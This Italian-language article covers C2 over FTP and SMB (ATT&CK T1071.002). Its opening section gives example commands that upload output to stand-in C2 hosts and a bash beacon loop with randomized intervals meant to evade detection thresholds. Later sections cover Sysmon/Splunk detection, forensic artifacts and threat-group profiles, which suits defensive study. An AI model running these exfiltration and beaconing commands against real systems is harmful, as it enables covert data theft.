Protocolli di Trasferimento File per C2: File Transfer Protocols (T1071.002)

Il setup di un canale FTP per C2 richiede pochi passaggi ma offre grande flessibilità. Su Windows, l'FTP client nativo può essere weaponizzato immediatamente:

ftp -s:commands.txt malicious.domain.com

Il file commands.txt contiene le credenziali e i comandi da eseguire automaticamente. Per SMB, PowerShell offre capacità native di mounting remoto che simulano perfettamente il comportamento di Cobalt Strike:

New-PSDrive -Name "C2" -PSProvider FileSystem -Root "\attacker.ip\share" -Credential $cred

Su Linux, il trasferimento via SCP o SFTP può essere automatizzato con chiavi SSH pre-condivise. La tecnica diventa particolarmente efficace quando combinata con job schedulati che uploadano periodicamente i risultati dei comandi:

curl -T output.txt ftp://anonymous:pass@c2server.com/uploads/

Per simulare il comportamento di BADHATCH, è possibile creare un FTP server fake che risponde solo a client specifici. Python offre librerie come pyftpdlib per implementare rapidamente un server custom che logga tutte le interazioni mentre mantiene la facciata di un servizio legittimo.

L'aspetto più sottile sta nel traffic shaping: i tool professionali come ShadowPad implementano throttling e randomizzazione degli intervalli di comunicazione. Un semplice script bash può replicare questo comportamento:

while true; do curl -T /tmp/beacon.txt ftp://c2.server/; sleep $((RANDOM % 300 + 60)); done

La chiave sta nel bilanciare frequenza delle comunicazioni e volume di dati trasferiti per rimanere sotto i threshold di detection.

La detection efficace richiede correlazione tra log di processo e traffico di rete. Il primo indicatore da monitorare è l'uso di FTP client da processi sospetti: quando cmd.exe, powershell.exe o rundll32.exe generano traffico FTP, siamo di fronte a un forte indicatore di compromissione.

Sysmon Event ID 3 cattura le connessioni di rete e permette di identificare pattern anomali. Una query Splunk efficace potrebbe essere:

index=sysmon EventCode=3 (DestinationPort=21 OR DestinationPort=445) Image="\cmd.exe" | stats count by ComputerName, DestinationIp*

Il volume di traffico è cruciale: trasferimenti FTP con rapporto outbound/inbound superiore al 90% indicano exfiltration o download di payload. I sistemi NSM devono tracciare non solo le connessioni ma anche i byte trasferiti per direzione.

Un aspetto spesso trascurato è il monitoraggio di porte non standard. APT41 è noto per utilizzare FTP su porte alternative come 443 o 8080. La detection basata su deep packet inspection può identificare protocolli FTP/SMB indipendentemente dalla porta utilizzata.

Per ridurre i falsi positivi, è fondamentale creare whitelist dei server FTP/SMB legittimi nell'ambiente. Ogni nuova destinazione dovrebbe triggerare un alert di severity media che richiede validazione manuale. L'automazione può classificare il traffico basandosi su reputazione IP, geolocalizzazione e presenza in threat intelligence feed.

Gli EDR moderni offrono detection comportamentale che identifica sequenze di azioni tipiche del C2 via file transfer: creazione di file temporanei, compressione, upload via FTP e successiva eliminazione. Queste catene di eventi, quando correlate temporalmente, forniscono alta confidenza nella detection.

L'analisi forense del C2 via protocolli file richiede attenzione a molteplici artefatti. Su Windows, il file *%APPDATA%\Microsoft\Windows\Recent* mantiene traccia degli ultimi file acceduti via SMB, inclusi share remoti utilizzati per C2.

I log IIS-FTP (quando abilitati) contengono dettagli preziosi su ogni trasferimento: *C:\inetpub\logs\LogFiles\FTPSVC*. Questi log includono timestamp, IP sorgente, username e path completo dei file trasferiti. La correlazione con i log di autenticazione può rivelare credenziali compromesse.

Per ricostruire l'attività di Kimsuky, l'analisi del registro deve focalizzarsi su: HKEY_CURRENT_USER\Software\Microsoft\FTP\Sites

Questa chiave mantiene la storia delle connessioni FTP effettuate dal sistema. Su Linux, il file .bash_history degli utenti compromessi spesso contiene comandi FTP/SCP con credenziali in chiaro.

La memoria volatile può contenere password FTP ancora in clear-text. Tools come Volatility permettono di estrarre credenziali da processi FTP attivi. Il plugin consoles rivela spesso comandi completi con parametri sensibili.

Per Operation Honeybee, l'analisi dei prefetch files (C:\Windows\Prefetch\FTP.EXE-.pf*) ha permesso di identificare i timestamp esatti delle esecuzioni e i file acceduti durante ogni sessione. La correlazione temporale con altri indicatori ha rivelato finestre di attività di 2-3 ore notturne, suggerendo operatori in fuso orario asiatico.

Gli artefatti di rete come le tabelle ARP e la cache DNS possono confermare comunicazioni con server C2. Il comando arp -a salvato in un dump di memoria spesso rivela IP di destinazione anche dopo che le connessioni sono terminate.

Dragonfly utilizza SMB come canale primario, sfruttando la diffusione del protocollo negli ambienti enterprise Windows. Il gruppo preferisce compromettere un sistema interno e utilizzarlo come relay SMB, rendendo il traffico C2 completamente interno e difficile da distinguere.

SilverTerrier mostra predilezione per FTP standard sulla porta 21, spesso utilizzando credenziali rubate da browser o client FTP legittimi. Il gruppo opera principalmente dall'Africa occidentale e targetizza istituzioni finanziarie, con pattern di attività concentrati durante l'orario lavorativo locale.

Kimsuky, con focus su target sudcoreani, implementa FTP per il download di malware secondari piuttosto che per C2 continuo. Questo approccio "fire and forget" riduce l'esposizione ma richiede infrastruttura FTP usa e getta, tipicamente su hosting compromessi.

APT41 dimostra la maggiore sofisticazione tecnica, utilizzando exploit che iniziano download FTP automatici post-compromissione. Il gruppo mantiene diversi livelli di infrastruttura: server FTP primari per payload iniziali e secondari per C2 a lungo termine.

L'analisi delle campagne Quad7 Activity rivela un trend emergente: l'uso di router SOHO compromessi come proxy FTP. Con oltre 63.256 dispositivi compromessi, principalmente TP-Link e Asus, questa botnet fornisce un layer di anonimizzazione difficile da tracciare. Gli operatori cambiano frequentemente porte (da 7777 a 63256) e banner (da "xlogin" ad "alogin") per evadere detection signature-based.

I tool comuni tra questi attori includono PoetRAT e Machete per operazioni mirate, mentre Cobalt Strike rimane la scelta per penetration su larga scala. L'overlap nell'uso di FTP su porte non standard suggerisce condivisione di TTP o possibili collaborazioni tra gruppi.

Framework MITRE ATT&CK T1071.002. Campagne documentate: Operation Honeybee (2017-2018), Quad7 Activity (2023-ongoing). Risorse detection: Sysmon per endpoint Windows, auditd per Linux, osquery per macOS. NSM flow analysis per correlazione traffico di rete.